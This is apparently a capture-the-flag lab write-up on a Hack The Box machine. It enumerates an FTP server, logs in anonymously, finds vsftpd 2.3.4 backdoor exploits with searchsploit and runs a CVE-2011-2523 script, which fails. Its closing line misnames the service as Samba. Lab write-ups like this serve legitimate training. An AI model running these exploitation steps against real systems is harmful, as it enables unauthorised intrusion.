FTP
Nmap discovered a FTP server on the target port 21
The running service is vsftpd 2.3.4
while vsftp 2.3.4
is known to have a backdoor vulnerability, I will take a look at the content hosted inside
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ ftp $IP
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23512|).
150 Here comes the directory listing.
226 Directory send OK.
While the target FTP server allows anonymous login, nothing seems to be inside
Vulnerability
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ searchsploit vsftp 2.3.4
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
-------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No Results
I have exploit available locally.
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ python3 CVE-2011-2523.py $IP 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[!] failed to connect to backdoor on 10.10.10.3:6200
The target Samba instance is not vulnerable to CVE-2011-2523